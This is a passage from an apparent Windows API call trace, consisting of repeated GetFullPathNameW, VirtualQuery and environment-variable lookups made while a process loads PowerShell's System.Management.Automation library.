lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0030.057] GetLastError () returned 0xcb [0030.057] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d9d4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0030.057] GetLastError () returned 0xcb [0030.057] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24da20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0030.057] GetLastError () returned 0xcb [0030.057] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d9d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0030.057] GetLastError () returned 0xcb [0030.057] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d9d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0030.057] GetLastError () returned 0xcb [0030.057] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24da20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0030.057] GetLastError () returned 0xcb [0030.057] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d9d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0030.057] GetLastError () returned 0xcb [0030.057] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d9d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0030.057] GetLastError () returned 0xcb [0030.058] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24da20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0030.058] GetLastError () returned 0xcb [0030.058] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d9d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0030.058] GetLastError () returned 0xcb [0030.058] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d9d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0030.058] GetLastError () returned 0xcb [0030.058] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24da20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0030.058] GetLastError () returned 0xcb [0030.058] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d9d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0030.058] GetLastError () returned 0xcb [0030.058] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d9d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0030.058] GetLastError () returned 0xcb [0030.058] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24da20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0030.058] GetLastError () returned 0xcb [0030.058] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d9d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0030.058] GetLastError () returned 0xcb [0030.058] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d9d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0030.058] GetLastError () returned 0xcb [0030.058] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24da20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0030.058] GetLastError () returned 0xcb [0030.058] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d9d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0030.058] GetLastError () returned 0xcb [0030.058] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d9d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0030.058] GetLastError () returned 0xcb [0030.058] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24da20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0030.058] GetLastError () returned 0xcb [0030.058] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d9d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0030.058] GetLastError () returned 0xcb [0030.058] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d9d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0030.059] GetLastError () returned 0xcb [0030.059] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24da20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0030.059] GetLastError () returned 0xcb [0030.059] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d9d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0030.059] GetLastError () returned 0xcb [0030.059] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d9d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0030.059] GetLastError () returned 0xcb [0030.059] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24da20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0030.059] GetLastError () returned 0xcb [0030.059] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d9d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0030.059] GetLastError () returned 0xcb [0030.059] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d9d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0030.059] GetLastError () returned 0xcb [0030.064] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24da04, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0030.064] GetLastError () returned 0xcb [0030.064] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d9b4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0030.064] GetLastError () returned 0xcb [0030.064] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d9b4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0030.064] GetLastError () returned 0xcb [0030.064] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d9b4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0030.064] GetLastError () returned 0xcb [0030.086] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24da04, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0030.086] GetLastError () returned 0xcb [0030.086] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d9b4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0030.086] GetLastError () returned 0xcb [0030.086] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d9b4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0030.086] GetLastError () returned 0xcb [0030.086] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24da04, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0030.086] GetLastError () returned 0xcb [0030.086] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d9b4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0030.086] GetLastError () returned 0xcb [0030.086] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d9b4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0030.086] GetLastError () returned 0xcb [0030.086] VirtualQuery (in: lpAddress=0x24cf30, lpBuffer=0x24df30, dwLength=0x1c | out: lpBuffer=0x24df30*(BaseAddress=0x24c000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0030.087] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0xd2630, nSize=0x80 | out: lpBuffer="") returned 0x0 [0030.087] GetLastError () returned 0xcb [0030.091] VirtualQuery (in: lpAddress=0x24cf30, lpBuffer=0x24df30, dwLength=0x1c | out: lpBuffer=0x24df30*(BaseAddress=0x24c000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0030.094] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0xd2630, nSize=0x80 | out: lpBuffer="") returned 0x0 [0030.094] GetLastError () returned 0xcb [0030.095] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0xd2630, nSize=0x80 | out: lpBuffer="") returned 0x0 [0030.095] GetLastError () returned 0xcb [0030.096] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0xd2630, nSize=0x80 | out: lpBuffer="") returned 0x0 [0030.096] GetLastError () returned 0xcb [0030.096] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0xd2630, nSize=0x80 | out: lpBuffer="") returned 0x0 [0030.096] GetLastError () returned 0xcb [0030.097] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0xd2630, nSize=0x80 | out: lpBuffer="") returned 0x0 [0030.097] GetLastError () returned 0xcb [0030.098] VirtualQuery (in: lpAddress=0x24cf30, lpBuffer=0x24df30, dwLength=0x1c | out: lpBuffer=0x24df30*(BaseAddress=0x24c000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0030.098] VirtualQuery (in: lpAddress=0x24cf30, lpBuffer=0x24df30, dwLength=0x1c | out: lpBuffer=0x24df30*(BaseAddress=0x24c000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0030.123] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0xd2630, nSize=0x80 | out: lpBuffer="") returned 0x0 [0030.123] GetLastError () returned 0xcb [0030.144] VirtualQuery (in: lpAddress=0x24cf30, lpBuffer=0x24df30, dwLength=0x1c | out: lpBuffer=0x24df30*(BaseAddress=0x24c000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0030.149] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0xd2630, nSize=0x80 | out: lpBuffer="") returned 0x0 [0030.149] GetLastError () returned 0xcb [0030.303] LocalAlloc (uFlags=0x0, uBytes=0x80) returned 0xcf480 [0030.303] GetLastError () returned 0x0 [0030.303] LocalAlloc (uFlags=0x0, uBytes=0x80) returned 0xd0f10 [0030.303] GetLastError () returned 0x0 [0030.390] VirtualQuery (in: lpAddress=0x24cf30, lpBuffer=0x24df30, dwLength=0x1c | out: lpBuffer=0x24df30*(BaseAddress=0x24c000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0030.403] VirtualQuery (in: lpAddress=0x24cf30, lpBuffer=0x24df30, dwLength=0x1c | out: lpBuffer=0x24df30*(BaseAddress=0x24c000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0030.404] VirtualQuery (in: lpAddress=0x24cf30, lpBuffer=0x24df30, dwLength=0x1c | out: lpBuffer=0x24df30*(BaseAddress=0x24c000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0030.404] VirtualQuery (in: lpAddress=0x24c5e4, lpBuffer=0x24d5e4, dwLength=0x1c | out: lpBuffer=0x24d5e4*(BaseAddress=0x24c000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0030.425] VirtualQuery (in: lpAddress=0x24cf30, lpBuffer=0x24df30, dwLength=0x1c | out: lpBuffer=0x24df30*(BaseAddress=0x24c000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0030.425] VirtualQuery (in: lpAddress=0x24cf30, lpBuffer=0x24df30, dwLength=0x1c | out: lpBuffer=0x24df30*(BaseAddress=0x24c000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0030.425] VirtualQuery (in: lpAddress=0x24cf30, lpBuffer=0x24df30, dwLength=0x1c | out: lpBuffer=0x24df30*(BaseAddress=0x24c000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0030.425] VirtualQuery (in: lpAddress=0x24cf30, lpBuffer=0x24df30, dwLength=0x1c | out: lpBuffer=0x24df30*(BaseAddress=0x24c000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0030.425] VirtualQuery (in: lpAddress=0x24cf30, lpBuffer=0x24df30, dwLength=0x1c | out: lpBuffer=0x24df30*(BaseAddress=0x24c000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0030.425] VirtualQuery (in: lpAddress=0x24cf30, lpBuffer=0x24df30, dwLength=0x1c | out: lpBuffer=0x24df30*(BaseAddress=0x24c000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0030.425] VirtualQuery (in: lpAddress=0x24cf30, lpBuffer=0x24df30, dwLength=0x1c | out: lpBuffer=0x24df30*(BaseAddress=0x24c000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0030.425] VirtualQuery (in: lpAddress=0x24cf30, lpBuffer=0x24df30, dwLength=0x1c | out: lpBuffer=0x24df30*(BaseAddress=0x24c000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0030.425] VirtualQuery (in: lpAddress=0x24cf30, lpBuffer=0x24df30, dwLength=0x1c | out: lpBuffer=0x24df30*(BaseAddress=0x24c000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0030.425] VirtualQuery (in: lpAddress=0x24cf30, lpBuffer=0x24df30, dwLength=0x1c | out: lpBuffer=0x24df30*(BaseAddress=0x24c000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0030.425] VirtualQuery (in: lpAddress=0x24cf30, lpBuffer=0x24df30, dwLength=0x1c | out: lpBuffer=0x24df30*(BaseAddress=0x24c000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0030.425] VirtualQuery (in: lpAddress=0x24cf30, lpBuffer=0x24df30, dwLength=0x1c | out: lpBuffer=0x24df30*(BaseAddress=0x24c000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0030.426] VirtualQuery (in: lpAddress=0x24cf30, lpBuffer=0x24df30, dwLength=0x1c | out: lpBuffer=0x24df30*(BaseAddress=0x24c000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0030.426] VirtualQuery (in: lpAddress=0x24cf30, lpBuffer=0x24df30, dwLength=0x1c | out: lpBuffer=0x24df30*(BaseAddress=0x24c000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0030.426] VirtualQuery (in: lpAddress=0x24cf30, lpBuffer=0x24df30, dwLength=0x1c | out: lpBuffer=0x24df30*(BaseAddress=0x24c000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0030.426] VirtualQuery (in: lpAddress=0x24cf30, lpBuffer=0x24df30, dwLength=0x1c | out: lpBuffer=0x24df30*(BaseAddress=0x24c000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0030.426] VirtualQuery (in: lpAddress=0x24cf30, lpBuffer=0x24df30, dwLength=0x1c | out: lpBuffer=0x24df30*(BaseAddress=0x24c000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0030.426] VirtualQuery (in: lpAddress=0x24cf30, lpBuffer=0x24df30, dwLength=0x1c | out: lpBuffer=0x24df30*(BaseAddress=0x24c000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0030.426] VirtualQuery (in: lpAddress=0x24cf30, lpBuffer=0x24df30, dwLength=0x1c | out: lpBuffer=0x24df30*(BaseAddress=0x24c000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0030.426] VirtualQuery (in: lpAddress=0x24cf30, lpBuffer=0x24df30, dwLength=0x1c | out: lpBuffer=0x24df30*(BaseAddress=0x24c000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0030.426] VirtualQuery (in: lpAddress=0x24cf30, lpBuffer=0x24df30, dwLength=0x1c | out: lpBuffer=0x24df30*(BaseAddress=0x24c000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0030.426] VirtualQuery (in: lpAddress=0x24cf30, lpBuffer=0x24df30, dwLength=0x1c | out: lpBuffer=0x24df30*(BaseAddress=0x24c000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0030.426] VirtualQuery (in: lpAddress=0x24cf30, lpBuffer=0x24df30, dwLength=0x1c | out: lpBuffer=0x24df30*(BaseAddress=0x24c000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0030.426] VirtualQuery (in: lpAddress=0x24cf30, lpBuffer=0x24df30, dwLength=0x1c | out: lpBuffer=0x24df30*(BaseAddress=0x24c000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0030.426] VirtualQuery (in: lpAddress=0x24cf30, lpBuffer=0x24df30, dwLength=0x1c | out: 